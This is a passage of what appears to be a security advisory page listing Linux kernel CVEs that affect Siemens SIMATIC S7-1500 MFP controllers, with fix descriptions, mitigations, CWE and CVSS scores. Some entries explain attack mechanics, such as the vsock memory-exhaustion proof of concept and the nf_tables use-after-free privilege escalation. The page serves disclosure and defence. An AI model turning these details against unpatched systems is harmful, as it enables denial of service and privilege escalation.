<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23086</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: cap TX credit to local buffer size The virtio transports derives its TX credit directly from peer_buf_alloc, which is set from the remote endpoint's SO_VM_SOCKETS_BUFFER_SIZE value. On the host side this means that the amount of data we are willing to queue for a connection is scaled by a guest-chosen buffer size, rather than the host's own vsock configuration. A malicious guest can advertise a large buffer and read slowly, causing the host to allocate a correspondingly large amount of sk_buff memory. The same thing would happen in the guest with a malicious host, since virtio transports share the same code base. Introduce a small helper, virtio_transport_tx_buf_size(), that returns min(peer_buf_alloc, buf_alloc), and use it wherever we consume peer_buf_alloc. This ensures the effective TX window is bounded by both the peer's advertised buffer and our own buf_alloc (already clamped to buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE), so a remote peer cannot force the other to queue more data than allowed by its own vsock settings. On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with 32 guest vsock connections advertising 2 GiB each and reading slowly drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only recovered after killing the QEMU process. That said, if QEMU memory is limited with cgroups, the maximum memory used will be limited. With this patch applied: Before: MemFree: ~61.6 GiB Slab: ~142 MiB SUnreclaim: ~117 MiB After 32 high-credit connections: MemFree: ~61.5 GiB Slab: ~178 MiB SUnreclaim: ~152 MiB Only ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the guest remains responsive. Compatibility with non-virtio transports: - VMCI uses the AF_VSOCK buffer knobs to size its queue pairs per socket based on the local vsk-&gt;buffer_* values; the remote side cannot enlarge those queues beyond what the local endpoint configured. - Hyper-V's vsock transport uses fixed-size VMBus ring buffers and an MTU bound; there is no peer-controlled credit field comparable to peer_buf_alloc, and the remote endpoint cannot drive in-flight kernel memory above those ring sizes. - The loopback path reuses virtio_transport_common.c, so it naturally follows the same semantics as the virtio transport. This change is limited to virtio_transport_common.c and thus affects virtio-vsock, vhost-vsock, and loopback, bringing them in line with the "remote window intersected with local policy" behaviour that VMCI and Hyper-V already effectively have. [Stefano: small adjustments after changing the previous patch] [Stefano: tweak the commit message]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23086">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.2</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23087</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: xen: scsiback: Fix potential memory leak in scsiback_remove() Memory allocated for struct vscsiblk_info in scsiback_probe() is not freed in scsiback_remove() leading to potential memory leaks on remove, as well as in the scsiback_probe() error paths. Fix that by freeing it in scsiback_remove().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23087">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23095</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: gue: Fix skb memleak with inner IP protocol 0. syzbot reported skb memleak below. [0] The repro generated a GUE packet with its inner protocol 0. gue_udp_recv() returns -guehdr-&gt;proto_ctype for "resubmit" in ip_protocol_deliver_rcu(), but this only works with non-zero protocol number. Let's drop such packets. Note that 0 is a valid number (IPv6 Hop-by-Hop Option). I think it is not practical to encap HOPOPT in GUE, so once someone starts to complain, we could pass down a resubmit flag pointer to distinguish two zeros from the upper layer: * no error * resubmit HOPOPT [0] BUG: memory leak unreferenced object 0xffff888109695a00 (size 240): comm "syz.0.17", pid 6088, jiffies 4294943096 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 40 c2 10 81 88 ff ff 00 00 00 00 00 00 00 00 .@.............. backtrace (crc a84b336f): kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline] slab_post_alloc_hook mm/slub.c:4958 [inline] slab_alloc_node mm/slub.c:5263 [inline] kmem_cache_alloc_noprof+0x3b4/0x590 mm/slub.c:5270 __build_skb+0x23/0x60 net/core/skbuff.c:474 build_skb+0x20/0x190 net/core/skbuff.c:490 __tun_build_skb drivers/net/tun.c:1541 [inline] tun_build_skb+0x4a1/0xa40 drivers/net/tun.c:1636 tun_get_user+0xc12/0x2030 drivers/net/tun.c:1770 tun_chr_write_iter+0x71/0x120 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x45d/0x710 fs/read_write.c:686 ksys_write+0xa7/0x170 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xa4/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23095">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23100</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/hugetlb: fix hugetlb_pmd_shared() Patch series "mm/hugetlb: fixes for PMD table sharing (incl. using mmu_gather)", v3. One functional fix, one performance regression fix, and two related comment fixes. I cleaned up my prototype I recently shared [1] for the performance fix, deferring most of the cleanups I had in the prototype to a later point. While doing that I identified the other things. The goal of this patch set is to be backported to stable trees "fairly" easily. At least patch #1 and #4. Patch #1 fixes hugetlb_pmd_shared() not detecting any sharing Patch #2 + #3 are simple comment fixes that patch #4 interacts with. Patch #4 is a fix for the reported performance regression due to excessive IPI broadcasts during fork()+exit(). The last patch is all about TLB flushes, IPIs and mmu_gather. Read: complicated There are plenty of cleanups in the future to be had + one reasonable optimization on x86. But that's all out of scope for this series. Runtime tested, with a focus on fixing the performance regression using the original reproducer [2] on x86. This patch (of 4): We switched from (wrongly) using the page count to an independent shared count. Now, shared page tables have a refcount of 1 (excluding speculative references) and instead use ptdesc-&gt;pt_share_count to identify sharing. We didn't convert hugetlb_pmd_shared(), so right now, we would never detect a shared PMD table as such, because sharing/unsharing no longer touches the refcount of a PMD table. Page migration, like mbind() or migrate_pages() would allow for migrating folios mapped into such shared PMD tables, even though the folios are not exclusive. In smaps we would account them as "private" although they are "shared", and we would be wrongly setting the PM_MMAP_EXCLUSIVE in the pagemap interface. Fix it by properly using ptdesc_pmd_is_shared() in hugetlb_pmd_shared().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23100">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23103</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipvlan: Make the addrs_lock be per port Make the addrs_lock be per port, not per ipvlan dev. Initial code seems to be written in the assumption, that any address change must occur under RTNL. But it is not so for the case of IPv6. So 1) Introduce per-port addrs_lock. 2) It was needed to fix places where it was forgotten to take lock (ipvlan_open/ipvlan_close) This appears to be a very minor problem though. Since it's highly unlikely that ipvlan_add_addr() will be called on 2 CPU simultaneously. But nevertheless, this could cause: 1) False-negative of ipvlan_addr_busy(): one interface iterated through all port-&gt;ipvlans + ipvlan-&gt;addrs under some ipvlan spinlock, and another added IP under its own lock. Though this is only possible for IPv6, since looks like only ipvlan_addr6_event() can be called without rtnl_lock. 2) Race since ipvlan_ht_addr_add(port) is called under different ipvlan-&gt;addrs_lock locks This should not affect performance, since add/remove IP is a rare situation and spinlock is not taken on fast paths.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23103">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/413.html">CWE-413 Improper Resource Locking</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23110</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: core: Wake up the error handler when final completions race against each other The fragile ordering between marking commands completed or failed so that the error handler only wakes when the last running command completes or times out has race conditions. These race conditions can cause the SCSI layer to fail to wake the error handler, leaving I/O through the SCSI host stuck as the error state cannot advance. First, there is an memory ordering issue within scsi_dec_host_busy(). The write which clears SCMD_STATE_INFLIGHT may be reordered with reads counting in scsi_host_busy(). While the local CPU will see its own write, reordering can allow other CPUs in scsi_dec_host_busy() or scsi_eh_inc_host_failed() to see a raised busy count, causing no CPU to see a host busy equal to the host_failed count. This race condition can be prevented with a memory barrier on the error path to force the write to be visible before counting host busy commands. Second, there is a general ordering issue with scsi_eh_inc_host_failed(). By counting busy commands before incrementing host_failed, it can race with a final command in scsi_dec_host_busy(), such that scsi_dec_host_busy() does not see host_failed incremented but scsi_eh_inc_host_failed() counts busy commands before SCMD_STATE_INFLIGHT is cleared by scsi_dec_host_busy(), resulting in neither waking the error handler task. This needs the call to scsi_host_busy() to be moved after host_failed is incremented to close the race condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23110">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/821.html">CWE-821 Incorrect Synchronization</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23111</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate() nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don't need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct: nft_mapelem_activate(): if (nft_set_elem_active(ext, iter-&gt;genmask)) return 0; /* skip active, process inactive */ With the buggy catchall version: nft_map_catchall_activate(): if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */ The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain-&gt;use reference count. Each abort cycle permanently decrements chain-&gt;use. Once chain-&gt;use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23111">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23113</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: io_uring/io-wq: check IO_WQ_BIT_EXIT inside work run loop Currently this is checked before running the pending work. Normally this is quite fine, as work items either end up blocking (which will create a new worker for other items), or they complete fairly quickly. But syzbot reports an issue where io-wq takes seemingly forever to exit, and with a bit of debugging, this turns out to be because it queues a bunch of big (2GB - 4096b) reads with a /dev/msr* file. Since this file type doesn't support -&gt;read_iter(), loop_rw_iter() ends up handling them. Each read returns 16MB of data read, which takes 20 (!!) seconds. With a bunch of these pending, processing the whole chain can take a long time. Easily longer than the syzbot uninterruptible sleep timeout of 140 seconds. This then triggers a complaint off the io-wq exit path: INFO: task syz.4.135:6326 blocked for more than 143 seconds. Not tainted syzkaller #0 Blocked by coredump. "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:syz.4.135 state:D stack:26824 pid:6326 tgid:6324 ppid:5957 task_flags:0x400548 flags:0x00080000 Call Trace: context_switch kernel/sched/core.c:5256 [inline] __schedule+0x1139/0x6150 kernel/sched/core.c:6863 __schedule_loop kernel/sched/core.c:6945 [inline] schedule+0xe7/0x3a0 kernel/sched/core.c:6960 schedule_timeout+0x257/0x290 kernel/time/sleep_timeout.c:75 do_wait_for_common kernel/sched/completion.c:100 [inline] __wait_for_common+0x2fc/0x4e0 kernel/sched/completion.c:121 io_wq_exit_workers io_uring/io-wq.c:1328 [inline] io_wq_put_and_exit+0x271/0x8a0 io_uring/io-wq.c:1356 io_uring_clean_tctx+0x10d/0x190 io_uring/tctx.c:203 io_uring_cancel_generic+0x69c/0x9a0 io_uring/cancel.c:651 io_uring_files_cancel include/linux/io_uring.h:19 [inline] do_exit+0x2ce/0x2bd0 kernel/exit.c:911 do_group_exit+0xd3/0x2a0 kernel/exit.c:1112 get_signal+0x2671/0x26d0 kernel/signal.c:3034 arch_do_signal_or_restart+0x8f/0x7e0 arch/x86/kernel/signal.c:337 __exit_to_user_mode_loop kernel/entry/common.c:41 [inline] exit_to_user_mode_loop+0x8c/0x540 kernel/entry/common.c:75 __exit_to_user_mode_prepare include/linux/irq-entry-common.h:226 [inline] syscall_exit_to_user_mode_prepare include/linux/irq-entry-common.h:256 [inline] syscall_exit_to_user_mode_work include/linux/entry-common.h:159 [inline] syscall_exit_to_user_mode include/linux/entry-common.h:194 [inline] do_syscall_64+0x4ee/0xf80 arch/x86/entry/syscall_64.c:100 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fa02738f749 RSP: 002b:00007fa0281ae0e8 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca RAX: fffffffffffffe00 RBX: 00007fa0275e6098 RCX: 00007fa02738f749 RDX: 0000000000000000 RSI: 0000000000000080 RDI: 00007fa0275e6098 RBP: 00007fa0275e6090 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007fa0275e6128 R14: 00007fff14e4fcb0 R15: 00007fff14e4fd98 There's really nothing wrong here, outside of processing these reads will take a LONG time. However, we can speed up the exit by checking the IO_WQ_BIT_EXIT inside the io_worker_handle_work() loop, as syzbot will exit the ring after queueing up all of these reads. Then once the first item is processed, io-wq will simply cancel the rest. That should avoid syzbot running into this complaint again.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23113">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
